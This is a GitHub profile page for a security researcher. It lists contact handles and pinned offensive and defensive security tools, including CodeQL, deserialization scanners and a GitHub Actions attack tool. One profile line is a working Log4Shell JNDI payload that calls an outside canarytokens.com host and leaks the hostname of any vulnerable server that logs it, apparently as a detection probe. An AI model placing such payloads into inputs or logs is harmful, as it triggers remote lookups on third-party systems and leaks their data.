JLLeitschuh
Follow
- ${jndi:ldap://x${hostName}.L4J.lile3fakwhyqg99zgj0yytxz7.canarytokens.com/a}
- @JLLeitschuh
- @JLLeitschuh@infosec.exchange
- @jlleitschuh.bsky.social
- in/jonathan-leitschuh
Highlights
🔑 Security Research Tools
CodeQL: the libraries and queries that power security researchers around the world, as well as code scanning in GitHub Advanced Security
Probe endpoints consuming Java serialized objects to identify classes, libraries, and library versions on remote Java classpaths.
Automatically identify deserialisation issues in Java and .NET applications by using active and passive scans
GitHub Actions Pipeline Enumeration and Attack Tool
The Big List of Naughty Strings is a list of strings which have a high probability of causing issues when used as user-input data.
Example repository for GitHub Actions Time of Check to Time of Use (TOCTOU vulnerabilities)
Integrated web scraper and email account data breach comparison tool
Python code that removes weak redactions from PDF files.